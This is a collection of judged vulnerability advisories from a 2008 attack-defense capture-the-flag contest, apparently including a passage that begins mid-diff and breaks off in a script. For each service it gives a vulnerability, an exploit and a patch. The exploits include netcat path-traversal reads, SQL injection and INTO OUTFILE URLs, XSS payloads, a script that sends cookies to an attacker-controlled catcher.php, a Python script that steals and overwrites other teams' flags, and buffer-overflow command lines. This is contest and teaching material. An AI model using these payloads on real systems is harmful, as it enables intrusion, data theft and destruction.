@@ -62,11 +64,16 @@
$filename=$_FILES['f']['name'];
$filesize=$_FILES['f']['size'];
$filetmp =$_FILES['f']['tmp_name'];
+if (preg_match('/.php$/i', $filename)){
+ echo "PHP is not allowed for uploading<br>";
+ exit;
+}
+
$servername=$_SERVER['SERVER_NAME'];
if ($filetmp && $filesize>0 && $filesize<=102400 && !file_exists($filepath) && $conn) {
mkdir($filepath);
mysql_query("INSERT INTO dir (id,dir) VALUES (".$id.",'".$filepath2."')");
- mysql_query("INSERT INTO id (usr,id) VALUES ('".$_COOKIE['user']."',".$id.")");
+ mysql_query("INSERT INTO id (usr,id) VALUES ('".$_SESSION['user']."',".$id.")");
$handle=fopen($filepath.".htaccess","w");
fwrite($handle,"Options +Indexes");
fclose($handle);
 
 
 
 
********************* Advisory 77, Defender of the Flag on ghoSTFTP
 
Scored: 3
Submitted: 21:03:38 1.8.2008
Published: 21:33:38 1.8.2008
 
Judge tilo said: finally. nice exploit. but there is a an easier patch. read the rfc :-)
 
Advisory
In this service you can connect to the deamon. You can read the directory listing stored in the file .ls .
Afterwards you can read the files by requesting the filenames stored in .ls and get the flags as their content.
 
Exploit
get directory listing:
(perl -e 'print "\\x01.ls\\x00"';) | nc -u VULNERABLE 1025
(perl -e 'print "\\x01FILENAME\\x00"';) | nc -u VULNERABLE 1025
 
 
Patch
rename .ls in something hard to guess
 
********************* Advisory 78, ENOFLAG on rapid graffiti
 
Scored: 1
Submitted: 21:04:30 1.8.2008
Published: 21:34:30 1.8.2008
 
Judge tilo said: ok, good patch, but very easy to detect.
 
Advisory
the login screen shows all available usernames within a selectbox.
this provides a malicious user with information to brute-force accounts
 
Exploit
 
 
Patch
- echo "<tr><td>Login:</td><td><select name='login' size='4' style='width:172px;display:block'>";
- $result=mysql_query("SELECT usr FROM pw WHERE usr!='anonymous'");
- while($row = mysql_fetch_object($result)) {
- echo "<option value='".$row->usr."'>".$row->usr."</option>";
- }
- echo "</select></td></tr>";
+ echo "<tr><td>Login:</td><td>" ;
+ echo "<input name='login' style='width:172px;display:block' />";
+
+
+// echo"<select name='login' size='4' style='width:172px;display:block'>";
+// $result=mysql_query("SELECT usr FROM pw WHERE usr!='anonymous'");
+// while($row = mysql_fetch_object($result)) {
+// echo "<option value='".$row->usr."'>".$row->usr."</option>";
+// }
+// echo "</select>"
+
+ echo"</td></tr>";
+
 
********************* Advisory 81, Wizards of DoS on brook3
 
Scored: 5
Submitted: 21:12:54 1.8.2008
Published: 21:42:54 1.8.2008
 
Judge tilo said: the first brook3 advisory. correct. very nice!
 
Advisory
The sequence number check for the movement command verifies only if the games client OR the sequence number is correct. This might to enable an attacker to inject moves into an arbitrary.
 
Exploit
That way it is simple to inject false moves into any running game by just "guessing" the ip of the gamemaster.
 
Thus
echo "10.1.xx.3 10.0.100.12 k MOV n" | netcat 10.1.yy.3 3333
with xx,yy providing regular subnet numbers, k being an arbitrary number, n being a field number injects a move into the game played at 10.1.yy.3 between yy and xx.
 
This might confuse any of the brooks3 players.
 
Patch
The first patch is quite simple:
 
substitute
if ( not (isFullCol (board game) (atoi dat))
&& (src == (client game) || (atoi seq == seqno game + 1)))
 
in the function bMOV
 
with
if ( not (isFullCol (board game) (atoi dat))
&& (src == (client game) || (atoi seq == (seqno game) + 1)))
 
********************* Advisory 83, Defender of the Flag on rapid graffiti
 
Scored: 2
Submitted: 21:16:09 1.8.2008
Published: 21:46:09 1.8.2008
 
Judge tilo said: well, i think point 2 is new.
 
Advisory
In the Rapid service you have to check the input data in several fields.
 
Exploit
1.
→ the $_REQUEST('d') in the upload.php has to be checked, otherwise someone can create directories on the server (you have to remove all slashes with str_replace)
 
 
2.
→ the user-data from the cookie was directly put in the database without any check
 
 
Patch
1.
 
=> $dirname= str_replace(„/“, „“, mysql_real_escape_string($_REQUEST['d']));
=> $id = str_replace(„/“, ““ , $id);
 
2.
=> mysql_real_escape_string($_COOKIE['user'])
 
 
********************* Advisory 85, n0 sp00n on tagging
 
Scored: 3
Submitted: 21:32:08 1.8.2008
Published: 22:02:08 1.8.2008
 
Judge Lexi said: ok, and even nicely written
 
Advisory
Background:
Tagging allows users to upload and retrieve photo images
 
store.pm does not check the filename, so it is possible to write to arbitrary files owned by tagging - same for retrieve.pm (reading arbitrary files)
 
Exploit
nc -u 10.1.x.3 5354
retrieve <filename>
 
# assume user and pass are enroled
nc -u 10.1.x.3 5354
owner user
password pass
store <filename>
content
EOF
 
Patch
diff --git a/annotate.pm b/annotate.pm
index 7f8a531..d6b92fb 100644
--- a/annotate.pm
+++ b/annotate.pm
@@ -5,6 +5,7 @@ use mickeysoft_sequel;
sub init {
my ($self,$filename) = @_;
$self={};
+ $filename =~ s/[^\\da-zA-Z\\.]//g;
print "annotate::init to $filename\
";
$self->{'filename'} = $filename;
$self->{'tags'} = [];
diff --git a/enroll.pm b/enroll.pm
index af8d1ed..57ae780 100644
--- a/enroll.pm
+++ b/enroll.pm
@@ -4,6 +4,7 @@ use mickeysoft_sequel;
 
sub init {
my ($self,$username) = @_;
+ $username =~ s/[^\\da-zA-Z\\.]//g;
$self={};
print "enroll::init for $username\
";
$self->{'username'} = $username;
diff --git a/register.pm b/register.pm
index b04bb68..7cb9586 100644
--- a/register.pm
+++ b/register.pm
@@ -4,6 +4,7 @@ use mickeysoft_sequel;
 
sub init {
my ($self,$filename) = @_;
+ $filename =~ s/[^\\da-zA-Z\\.]//g;
$self={};
print "register::init to $filename\
";
$self->{'filename'} = $filename;
diff --git a/remarks.pm b/remarks.pm
index 878cb90..eb19198 100644
--- a/remarks.pm
+++ b/remarks.pm
@@ -4,7 +4,8 @@ use mickeysoft_sequel;
 
sub init {
my ($self,$filename) = @_;
- $self={};
+$filename =~ s/[^\\da-zA-Z\\.]//g;
+$self={};
print "remarks::init to $filename\
";
$self->{'filename'} = $filename;
$self->{'db'} = mickeysoft_sequel::init();
diff --git a/retrieve.pm b/retrieve.pm
index 0a06bd0..5911243 100644
--- a/retrieve.pm
+++ b/retrieve.pm
@@ -2,10 +2,11 @@ package retrieve;
 
sub init {
my ($self,$filename) = @_;
+ $filename =~ s/[^\\da-zA-Z\\.]//g;
$self={};
print "retrieve::init to $filename\
";
$self->{'buffer'} = '';
- if (open(FILE,"< $filename")) {
+ if (open(FILE, "<", $filename")) {
while(<FILE>) { $self->{'buffer'} .= $_; }
close(FILE);
} else {
diff --git a/store.pm b/store.pm
index e3cb433..eee44c0 100644
--- a/store.pm
+++ b/store.pm
@@ -6,6 +6,7 @@ sub load {
 
sub init {
my ($self,$filename) = @_;
+ $filename =~ s/[^\\da-zA-Z\\.]//g;
$self={};
print "store::init to $filename\
";
$self->{'filename'} = $filename;
@@ -22,7 +23,7 @@ sub input {
}
print "store::input is appending to ".$self->{'filename'}."\
";
$self->{'failures'} = 0;
- if(open(FILE,">> ".$self->{'filename'})) {
+ if(open(FILE,">>",$self->{'filename'})) {
binmode(FILE);
print FILE $line;
close(FILE);
diff --git a/tagger.pl b/tagger.pl
index d06d4fb..31fe07c 100755
--- a/tagger.pl
+++ b/tagger.pl
@@ -4,6 +4,7 @@ use blackmagic;
use Socket;
use IO::Socket::INET;
use IO::Select;
+use Sys::Syslog;
$port = 5354;
 
$quit=0;
@@ -22,13 +23,14 @@ while(!$quit){
my %input4;
undef %input4;
$input4{$_} = 0 foreach(keys %sessions);
- # c3RyYW5nZWx5IGRvZXNudCBzZWVtIHRvIGZpcmUgb2Z0ZW4gZW5vdWdo
+ # strangely doesnt seem to fire often enough
if(@f=$select->can_read(0.5)) {
foreach$socket(@f){
$sin = $socket->recv($msg,0xffff);
+ syslog("info", "tagging received: $msg");
($p,$i) = sockaddr_in($sin);
$str=inet_ntoa($i).":$p";
- # c3RhcnQgbmV3IHNlc3Npb24=
+ # start new session
unless(defined $sessions{$sin}) {
@a=split(/ /,$msg);
$foo=shift(@a);
@@ -40,12 +42,13 @@ while(!$quit){
} else {
$sessions{$sin} = $bar;
}
- # bmV3IGlucHV0IGZvciBleGlzdGluZyBzZXNzaW9ucw==
+ # new input for existing sessions
} else {
$input4{$sin} += 1;
$bar = $sessions{$sin};
if($rmsg = $bar->input($msg)) {
$serv->send($rmsg,0,$sin);
+ syslog("info", "tagging sent: $rmsg");
} else {
$serv->send('',0,$sin);
print "$str aXMgY2xvc2Vk\
";
@@ -55,13 +58,14 @@ while(!$quit){
}
}
}
- # bWFpbnRhaW5nIGluYWN0aXZlIHNlc3Npb25z
+ # maintaing inactive sessions
foreach $sin (grep {!$input4{$_}} keys %input4) {
($p,$i) = sockaddr_in($sin);
$str=inet_ntoa($i).":$p";
$foo = $sessions{$sin};
if( $msg = $foo->idle() ) {
$serv->send($msg,0,$sin);
+ syslog("info", $msg);
} else {
print "$str aXMgY2xvc2Vk\
";
$foo->done();
 
 
********************* Advisory 88, h4ck!nb3rg on myspray
 
Scored: 2
Submitted: 21:48:40 1.8.2008
Published: 1:00:00 1.1.1970
 
Judge tilo said: this is not the first xss advisory. well i'm not sure if it the first one for writemessage.
 
Advisory
myspray is an application simmilar to studivz. it enables to recieve messages and also answer to them. the answer section is prone to cross site scripting attacks. if an admin reads the message, the cookie can be stolen and with administrative priviledges the attacker can take over control of the app.
 
Exploit
to write a message to a certain user, you can for example use the following url:
/myspray/writemessage2238.html
simply enter script tags to "subject" or "test".
for example:
<script>alert(document.cookie)</script>
instead of alerting the cookie, it could be sent to an attacker using an image tag.
 
Patch
simply patch "writemessage.html" to use htmlentities for the parameter mentioned above.
 
********************* Advisory 89, Flux Fingers on (General Fault)
 
Scored: 2
Submitted: 21:49:24 1.8.2008
Published: 22:19:24 1.8.2008
 
Judge Lexi said: nicely found :)
 
Advisory
This is more of a logic error.
 
The Method to randomize VPN Subnets to mask the Team and the Team-ID via the randomization can be cirumvented using the script.
 
http://10.0.0.10:8000/debugging_info.php
 
Exploit
http://10.0.0.10:8000/debugging_info.php?term=team&id=3
 
-> shows which Flag was revieved from which IP
 
Patch
Keep it the assignment Team-ID <---> SUBNET as in previous CIPHERs.
 
********************* Advisory 90, The RPIsec knurd machine on rapid graffiti
 
Scored: 3
Submitted: 21:52:42 1.8.2008
Published: 22:22:42 1.8.2008
 
Judge tilo said: Coool. One of the vulnerabilities I did not know about :-D
 
Advisory
JavaScript in an uploaded image file name will be executed by radmin.php
 
Exploit
Upload an image called <img src="aoeuaeouht.jpg" onerror="javascript:alert(document.cookie)">
If an admin logs into radmin.php, his cookies will pop up in an alert. You can use this technique to steal his cookies by redirecting him to a web server under your control.
 
Patch
HTML encode < and >. $filename = htmlentities($filename);
 
********************* Advisory 92, in23canation on rapid graffiti
 
Scored: 1
Submitted: 22:04:48 1.8.2008
Published: 22:34:48 1.8.2008
 
Judge tilo said: yet another sql injection... :-) missing exploit.
 
Advisory
vulnerable for SQL injection:
 
upload.php for example:
 
mysql_query("INSERT INTO dir (id,dir) VALUES (".$id.",'".$filepath."')");
 
 
Exploit
 
 
Patch
$id = mysql_escape_string($id);
$filepath = mysql_escape_string($filepath);
 
mysql_query("INSERT INTO dir (id,dir) VALUES (".$id.",'".$filepath."')");
mysql_query("INSERT INTO id (usr,id) VALUES ('anonymous',".$id.")");
 
 
********************* Advisory 93, n0 sp00n on tagging
 
Scored: 3
Submitted: 22:05:21 1.8.2008
Published: 22:35:21 1.8.2008
 
Judge Lexi said: much better
 
Advisory
query_remarks in the Tagging service allows a SQL injection that reveals the full remarks database.
 
 
Exploit
echo "query_remarks aaaaa' or length(text)=3
2 or 'a'='" | nc -u 10.1.x.3 5354
 
 
Patch
--- a/query_remarks.pm
+++ b/query_remarks.pm
@@ -10,6 +10,10 @@ sub init {
print "query_remarks::init to @_\
";
$self->{'buffer'} = [];
$db = mickeysoft_sequel::init();
+ my $tag = "@_";
+ if ($tag !~ /^[\\d+]$/) {
+ return;
+ }
$data = $db->work("SELECT text FROM remark WHERE tag='@_'");
if($data) {
foreach $row (@$data) {
 
********************* Advisory 94, The Electronic Mayhem on ghoSTFTP
 
Scored: 5
Submitted: 22:06:23 1.8.2008
Published: 22:36:23 1.8.2008
 
Judge tilo said: first real ghosti exploit and a very nice patch!!
 
Advisory
The ghoSTFTP service is a minimalist file transfer service. Due to a lack of input validation, this service allows an unauthenticated remote attacker to read any file that the service daemon is allowed to read.
 
Exploit
Simply send "\\x01/../..$MYPATH\\x00" as a UDP packet to port 1025, where $MYPATH is any absolute file path.
 
Patch
Perform input validation:
 
/checkFilename {
/filename exch def
/n filename length def
0 1 n 1 sub {
/i exch def
/c filename i get def
65 c le c 90 le and
97 c le c 122 le and or
48 c le c 57 le and or
not { quit } if
} for
} bind def
 
% Main
/main {
/len readstr def
/len len cvi def
/opcode readopc def
opcode (\\1) eq {
/filename readstr def
filename checkFilename
filename send
quit
} if
opcode (\\3) eq {
/filename readstr def
/len len filename length sub def
/len len 2 sub def
filename checkFilename
filename len receive
filename ps
filename ack
quit
} if
%opcode (\\6) eq {
% (.ls) send
% quit
%} if
(error) err
quit
} bind def
main
 
 
********************* Advisory 95, n0 sp00n on ghoSTFTP
 
Scored: 2
Submitted: 22:06:44 1.8.2008
Published: 22:36:44 1.8.2008
 
Judge tilo said: Finally somebody has read the RFC.
 
Advisory
See advisory 77. One can retrieve .ls by opcode 6 as well.
 
The opcode 6 is not in the RFC, so directory listing is not part of the standard!
 
 
Exploit
(perl -e 'print "x06"';) | nc -u VULNERABLE 1025
 
Patch
remove opcode 6 code
replace (.ls) send
by % (.ls) send
remove .ls file
 
********************* Advisory 97, n0 sp00n on ghoSTFTP
 
Scored: 1
Submitted: 22:10:05 1.8.2008
Published: 1:00:00 1.1.1970
 
Judge tilo said: hmmm, not quite correct. Think a little bit more about this.
 
Advisory
when ack is called (in opcode 3, writing files), .pi.ps is executed (as postscript code)
 
Exploit
overwrite .pi.ps using opcode 3, it is then executed on the next file write.
 
Patch
comment the (.pi.ps) run line
-> % (.pi.ps) run
 
********************* Advisory 98, h4ck!nb3rg on gabble
 
Scored: 3
Submitted: 22:10:32 1.8.2008
Published: 22:40:32 1.8.2008
 
Judge tilo said: Okay, just sql injections without exploit. But nice patch.
 
Advisory
all Database queries in Database.c will not be filtert to characters like "#,',..." which can be used for sql statements;
 
 
Exploit
 
 
Patch
add a function to check inputs like this:
 
/*
* check inputs to unallowed values
*/
int checkSQLString(char* string){
 
char[] ret;
ret=strchr(string,"'");
if (ret==NULL){
ret=strchr(string,"#");
if (ret==NULL)
ret=strchr(string,"`");
if (ret==NULL)
return 0;
}else{
return -1;
}
}
 
 
// and check the inputs e.g.
 
if(checkSQLString(user)!=0)
return -1;
if(checkSQLString(password)!=0)
return -1;
 
 
 
 
 
 
 
********************* Advisory 99, Flux Fingers on myspray
 
Scored: 3
Submitted: 22:13:34 1.8.2008
Published: 22:43:34 1.8.2008
 
Judge tilo said: The last XSS advisory that I accept. All vulnerable fields have been mentioned here and the exploit and patch are nice.
 
Advisory
MySpray is a clone of a well-known german social network. Every has its own profile-page, including information about him.
By entering malicous data, an adversary would be able to take over someones session and/or execute Javascript within the context of the MySpray-WebApplication. (E.g.: Steal the cookie of a victim visiting the the profile, change the victim's profile (this could lead to a myspray-worm (hi@samy). sweet!))
 
 
Exploit
Affected Form-Fields: First Name, Last Name, City, Jabber, Website, Job, Interests, and About me.
 
Example:
1) Change one of the affected fields to <script>document.location.href="http://myIP/catcher.php?cookie="+document.cookie</script>
2) Wait :)
 
3) tail -f <file_to_where_catcher.php logs>
 
 
 
 
Patch
Change "views.py" file. Use function htmlspecialchars().
 
 
********************* Advisory 100, ENOFLAG on rapid graffiti
 
Scored: 1
Submitted: 22:16:28 1.8.2008
Published: 22:46:28 1.8.2008
 
Judge tilo said: k
 
Advisory
some lame sql injection in sign.php
 
Exploit
 
 
Patch
always use sprintf for more clearness and add slashes....
 
$sql=sprintf("INSERT INTO pw (usr,pw,question,answer) VALUES ('%s','%s','%s','%s')",
addslashes($_REQUEST['un']) ,
addslashes($_REQUEST['pw']) ,
addslashes($_REQUEST['q']) ,
addslashes($_REQUEST['a'])
);
mysql_query($sql);
 
 
********************* Advisory 101, Amish Security on gabble
 
Scored: 2
Submitted: 22:16:41 1.8.2008
Published: 22:46:41 1.8.2008
 
Judge tilo said: First buffer overflow Advisory. But just a segFault...
 
Advisory
An sufficiently long username will break querylenght (1024) and
cause a segmentation fault.
 
int dbUserExists(char* user) {
MYSQL_RES *res;
MYSQL_ROW row;
int ret = 0;
char query[QUERYLEN];
 
sprintf(query,"SELECT name FROM users WHERE name='%s'",user);
if (mysql_query(conn,query)) {
fprintf(stderr,"%s\
",mysql_error(conn));
return ret;
}
res = mysql_use_result(conn);
row = mysql_fetch_row(res);
if (row != NULL) ret = 1;
mysql_free_result(res);
 
return ret;
}
 
Exploit
./gabbler <server> -e `perl -e 'print "1|"."a"x1000;print "|a;"'`
 
Patch
Limit the username size to something realistic.
 
Before sprintf :
 
if(strlen(user) > 60) { return 0; }
 
 
********************* Advisory 103, The RPIsec knurd machine on rapid graffiti
 
Scored: 1
Submitted: 22:21:05 1.8.2008
Published: 22:51:05 1.8.2008
 
Judge tilo said: Okay, XSS in rapid. But note that you won't get a flag with this exploit! Try something similar in myspray. The gameserver visits some myspray profiles with the gecko engine!
 
Advisory
There is CSRF and XSS in the username field of the sign.php page.
 
Exploit
You can make a GET request to make a new user account with JavaScript in their name. If you can get an admin or somebody who is logged in to click the link, you can steal their cookies.
 
https://10.1.x.3/rapid/ssl/sign.php?un=<script>alert(document.cookie);</script>&pw=aoeuaoeu&pw2=aoeuaoeu&q=forty&a=forty
 
 
Patch
HTML encode the username to prevent the tag from being interpreted. $_REQUEST['un'] = htmlentities($_REQUEST['un']);
 
********************* Advisory 104, in23canation on rapid graffiti
 
Scored: 1
Submitted: 22:21:44 1.8.2008
Published: 1:00:00 1.1.1970
 
Judge tilo said: ...
 
Advisory
Yet another sql injection:
 
mysql_query("INSERT INTO file (id,file) VALUES (".$id.",'".$filename."')");
 
 
Exploit
 
 
Patch
$filename = mysql_escape_string($id);
$filename = mysql_escape_string($filename);
 
mysql_query("INSERT INTO file (id,file) VALUES (".$id.",'".$filename."')");
 
 
********************* Advisory 106, in23canation on rapid graffiti
 
Scored: 1
Submitted: 22:23:31 1.8.2008
Published: 1:00:00 1.1.1970
 
Judge tilo said: ...
 
Advisory
SQL-injection:
 
$answer=mysql_query("SELECT dir.dir,file.file,id.usr
FROM dir JOIN file JOIN id
WHERE dir.id=file.id AND dir.id=id.id AND id.usr='".$login."'");
 
 
Exploit
 
 
Patch
$login = mysql_escape_string($login);
$answer=mysql_query("SELECT dir.dir,file.file,id.usr
FROM dir JOIN file JOIN id
WHERE dir.id=file.id AND dir.id=id.id AND id.usr='".$login."'");
 
 
********************* Advisory 107, HackerDom on rapid graffiti
 
Scored: 1
Submitted: 22:25:01 1.8.2008
Published: 22:55:01 1.8.2008
 
Judge tilo said: ...
 
Advisory
http://10.1.<team>.3/rapid/files/ is opened for listing. It is able to view all dir and files (images with flags).
 
Exploit
For example: http://10.1.14.3/rapid/files/
 
Patch
in /etc/apache2/sites-enabled/rapid
set Options -Indexes for 80 & 443 ports
 
********************* Advisory 108, HackerDom on ghoSTFTP
 
Scored: 1
Submitted: 22:34:35 1.8.2008
Published: 23:04:35 1.8.2008
 
Judge Lexi said: not first, see 20:10, but at least exploit and patch given
 
Advisory
ghoSTFTP after receiving file and before sending acknowledgement runs ps function:
 
filename len receive
filename ps
filename ack
 
which compares, where the uploaded filename ends with .ps or not. If it is a *.ps file, then it is executed.
 
Exploit
Form arbitrary program in postscript, which is less than 128 bytes, and upload it.
 
Patch
remove
filename ps
and
% Execute a postscript file
/ps {
/filename exch def
/len filename length def
len 3 lt {
quit
} if
/c1 filename len 1 sub get def
/c2 filename len 2 sub get def
/c3 filename len 3 sub get def
c1 115 eq c2 112 eq and c3 46 eq and {
filename run
} if
} bind def
 
 
********************* Advisory 109, SYPER on brook3
 
Scored: 1
Submitted: 22:44:51 1.8.2008
Published: 23:14:51 1.8.2008
 
Judge tilo said: You are right. Wizards of DoS just forgot to subst. || by &&. Well, I still think they have detected the vuln.
 
Advisory
The patch sended:
Advisory from Wizards of DoS on Service brook3
 
Submitted at 21:12 01.08.2008
 
Scored by tilo with 5 scores.
 
Comment: "the first brook3 advisory. correct. very nice!"
 
have an error
 
Exploit
echo "10.1.x.3 10.1.y.3 0 CLR 0" | netcat 10.1.x.3 3333
echo "10.1.x.3 10.1.y.3 2 MOV 1" | netcat 10.1.x.3 3333
echo "10.1.x.3 10.1.w.3 4 MOV 1" | netcat 10.1.x.3 3333
 
"y" is a different client than "w"
 
"x" response to w like the game were with w and not with y.
 
if "y" send later with the correct seqno, it response too.
 
The game continue a the server to w
 
 
Patch
To patch de service it's necessary to do it:
 
substitute
if ( not (isFullCol (board game) (atoi dat))
&& (src == (client game) || (atoi seq == seqno game + 1)))
 
in the function bMOV
 
with
if ( not (isFullCol (board game) (atoi dat))
&& (src == (client game) && (atoi seq == (seqno game) + 1)))
 
The solutions of the last submission permit that a third client enter in the game, using the seqno game correct. The patch of other team not verify the two conditions. With the or, if one is true the condition is true. Other client with the same nro of sequence can modify de game. You cannot modify the client number.
 
 
 
********************* Advisory 111, HackerDom on ghoSTFTP
 
Scored: 1
Submitted: 22:57:46 1.8.2008
Published: 1:00:00 1.1.1970
 
Judge Lexi said: nice approach - though no real vuln
 
Advisory
ghoSTFTP is minimalistic ftplike daemon.
although the main part of the daemon is written in postscript, the connection is handled by unknown binary file, which may contain unknown errors.
 
Exploit
Use logging of rewriten daemon to get acquainted with exploits used by other teams.
 
Patch
Rewrite the daemon according to RFC:
 
root@vulnbox:/home/ghoSTFTP# cat ghoSTFTP.pl
#!/usr/bin/perl
 
use IO::Socket;
my($sock, $oldmsg, $newmsg, $hisaddr, $hishost, $MAXLEN, $PORTNO);
$MAXLEN = 1000000;
$PORTNO = 1025;
$sock = IO::Socket::INET->new(LocalPort => $PORTNO, Proto => 'udp')
or die "socket: $@";
while ($sock->recv($newmsg, $MAXLEN)) {
my($port, $ipaddr) = sockaddr_in($sock->peername);
$hishost = gethostbyaddr($ipaddr, AF_INET);
print "Client $hishost said ".ord($newmsg)." ``$newmsg''\
";
 
$newmsg = substr($newmsg, 0, 128);
my $cmd = ord(substr($newmsg, 0, 1));
my $data = substr($newmsg, 1);
if ($cmd == 1) {
# read request
if ($data =~ /^([^\\0]+)\\0$/) {
$filename = $1;
open F, $filename or goto ERROR;
$answer = chr(2)."$filename\\0".(join '', <F>);
close F;
$sock->send(substr($answer, 0, 128));
}
}
elsif ($cmd == 3) {
# write request
if ($data =~ /^([^\\0]+)\\0(.*)$/) {
$filename = $1;
$content = $2;
open F, ">$filename" or openError();
print F $content;
close F;
$answer = chr(4)."$filename\\0";
close F;
$sock->send(substr($answer, 0, 128));
}
} else {
ERROR:
$answer = chr(5)."ERROR\\0";
$sock->send(substr($answer, 0, 128));
}
}
die "recv: $!";
 
 
********************* Advisory 115, n0 sp00n on ghoSTFTP
 
Scored: 2
Submitted: 23:13:35 1.8.2008
Published: 23:43:35 1.8.2008
 
Judge tilo said: hmm yes. But there are more possibilities...
 
Advisory
When requesting the file 3.1415, the file .pi.ps is run as postscript code.
 
 
Exploit
Create a malicious file .pi.ps on the server with opcode 2,
write a file 3.1415 with opcode 2 to execute .pi.ps
 
Patch
remove the (.pi.ps) run line
 
********************* Advisory 116, Flux Fingers on rapid graffiti
 
Scored: 1
Submitted: 23:22:01 1.8.2008
Published: 23:52:01 1.8.2008
 
Judge tilo said: ok, sql injection...
 
Advisory
the service rapid allows user to upload files and host their graffities for free.
there is a SQLi in
rapid/ssl/forgot.php
 
[40] $result=mysql_query("SELECT question FROM pw WHERE usr='".$user."'");
39: $user=$_REQUEST['n'];
 
Exploit
an attacker can use the webbrowser to attack the service:
 
target/rapid/ssl/forgot.php?n=' and 1=0 union select column from table /*
 
also, there is the FILE privilege available for the standard users, so an attacker can write into files with INTO OUTFILE injection.
 
Patch
- 39: $user=$_REQUEST['n'];
 
+ 39: $user=mysql_real_escape_string($_REQUEST['n']);
 
********************* Advisory 119, in23canation on gabble
 
Scored: 1
Submitted: 23:25:53 1.8.2008
Published: 23:55:53 1.8.2008
 
Judge tilo said: exploit?
 
Advisory
it's possible to create htaccess files on the file system depending on the rights of the web server:
 
$filepath="files/".$id."/";
 
.....
 
$handle=fopen($filepath.".htaccess","w");
fwrite($handle,"Options +Indexes");
fclose($handle);
 
 
Exploit
 
 
Patch
$invalid=strpos($id, '.') || ($id === '');
 
if ($invalid) {
echo "Invalid ID</font></h3>";
echo "<p>As an administrator you can try to fix the problem <a href='admin'>here</a>.</p>";
exit();
}
 
 
********************* Advisory 120, Flux Fingers on rapid graffiti
 
Scored: 1
Submitted: 23:28:03 1.8.2008
Published: 23:58:03 1.8.2008
 
Judge tilo said: one of the last sql injections i accept....
 
Advisory
Rapid Advisory
----------------
 
The service rapid allows user to upload files and host their graffities for free.
There is a SQLi in the file "/home/rapid/ssl/login.php"
 
vulnerable lines:
----------------
 
[8] $result=mysql_query("SELECT pw FROM pw WHERE usr='".$login."'");
5: $login=$_REQUEST['login'];
 
The variable $login is not sanitized and given directly to an SQL query. Therefore, SQLinjection is possible.
 
 
Exploit
An attacker can use the webbrowser to attack the service:
 
http://target/rapid/ssl/login.php?pw=21312312&login=' or 1=1 INTO OUTFILE '/path/file.php' /*
 
We will use the FILE privilege, because we cant get the output of the query
 
 
Patch
- 5: $login=$_REQUEST['login'];
 
+ 5: $login=mysql_real_escape_string($_REQUEST['login']);
 
Make sure an attacker cant get out of the quotes with mysql_real_escape_string().
 
********************* Advisory 121, n0 sp00n on tagging
 
Scored: 4
Submitted: 23:30:42 1.8.2008
Published: 0:00:42 2.8.2008
 
Judge Lexi said: OMG - why did it take sooo long?
 
Advisory
Taggging allows to deploy perl modules via the store function. Code in the uploaded module can then be executed via the autoloader magic.
 
 
Exploit
( echo "store exploit.pm" ; cat exploit.pm ) | netcat -u 10.1.x.3 5354
echo "exploit somefunction" | netcat -u 10.1.x.3 5354
 
 
Patch
--- a/store.pm
+++ b/store.pm
@@ -7,6 +7,9 @@ sub load {
sub init {
my ($self,$filename) = @_;
$filename =~ s/[^\\da-zA-Z\\.]//g;
+ if ($filename =~ s/\\.pmc?$/) {
+ return;
+ }
$self={};
print "store::init to $filename\
";
$self->{'filename'} = $filename;
 
********************* Advisory 123, ENOFLAG on ghoSTFTP
 
Scored: 3
Submitted: 23:44:35 1.8.2008
Published: 0:14:35 2.8.2008
 
Judge tilo said: You can get a lot of flags with this exploit :-)
 
Advisory
This is a resubmit.
It is possible to get directory listings via sending \\x01.ls\\x00 to ghoSTFTP. This file contains all files in the directory. By parsing this list and sending \\x01<filename>\\x00 it is possible to get the content of the listed files.
 
Disclaimer: the exploit is probably the ugliest hack ever, but it works and scans all ghoSTFTP flags of the other teams overwriting the file content with ENOFLAG then.
 
Vulnerable code:
 
 
Exploit
#!/usr/bin/env python
 
import socket, sys
import re
 
socket.setdefaulttimeout(5)
file = []
 
def sendWrite(s, filename, data):
data = '\\x03%s\\x00%s' % (filename, data)
s.send(data)
(d, a) = s.recvfrom(MAXLEN)
 
def sendRead(s, filename):
foo = []
r = re.compile('.*[a-zA-Z0-9]+.*')
data = '\\x01%s\\x00 ' % filename
s.send(data)
(d, a) = s.recvfrom(MAXLEN)
for i in d.rsplit('\
')[1:]:
if r.match(i):
 
file.append(i)
print 'file found', i
 
return d
 
MAXLEN = 128
 
for i in xrange(1,33):
cip = '10.1.%d.3' %(i)
 
print 'connecting to %s' %(cip)
 
addr = (cip, 1025)
try:
s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
s.connect(addr)
sendRead(s, '.ls')
except:
continue
 
for i in file:
print sendRead(s, i)
sendWrite(s, i, "ENOFLAG")
 
 
Patch
/filehandler (.ls) (a) file def
=>
/filehandler (.lshardtoguessfilenameqwdwqdwqdwqdqwdqwdqwdqw) (a) file def
 
 
********************* Advisory 124, SYPER on gabble
 
Scored: 1
Submitted: 23:48:08 1.8.2008
Published: 0:18:08 2.8.2008
 
Judge tilo said: just another segfault.... Inject payload!!
 
Advisory
buffer overflow in database.c (with funtion pointer overwrite)
 
int dbGetStatus(char* status, char* user) {
MYSQL_RES *res;
MYSQL_ROW row;
int (*ptr) (char* usr);
ptr = &dbUserExists;
char query[QUERYLEN];
 
sprintf(query,"SELECT status FROM users WHERE name='%s'",user);
 
Exploit
./gabbler <addr> -e `perl -e 'print "\\x0d","a"x2000'`
 
 
Patch
Before sprintf :
if(strlen(password) > 60) { return 0; }
if(strlen(user) > 60) { return 0; }
 
********************* Advisory 125, HackerDom on ghoSTFTP
 
Scored: 4
Submitted: 0:01:24 2.8.2008
Published: 0:31:24 2.8.2008
 
Judge tilo said: Very nice! (if the exploit works. I did not test it).
 
Advisory
ghosti is a simple ftplike daemon, written on postscript.
if uploaded file was a ps file, it executes it.
 
Exploit:
 
 
Patch:
 
See patch in previos advisories
 
Exploit
upload such ps file:
/fileIndex exch def
/scratch 128 string def
/i 0 def
(*) {
/filename exch def
i fileIndex eq {
filename send
quit
} if
/i i 1 add def
} scratch filenameforall
stdout (We're done here.) writestring''
 
it sends a filename, which can be read after that in order to get flag.
 
Here is the script:
 
#!/usr/bin/perl
 
 
use Socket;
 
sub snd {
my ($MSG) = @_;
socket(SOCKET, PF_INET, SOCK_DGRAM, getprotobyname("udp")) or die "socket: $!";
 
$HOSTNAME = $ARGV[0];
#$HOSTNAME = 'localhost';
$PORTNO = 1025;
$MAXLEN = 128;
 
$ipaddr = inet_aton($HOSTNAME);
$portaddr = sockaddr_in($PORTNO, $ipaddr);
 
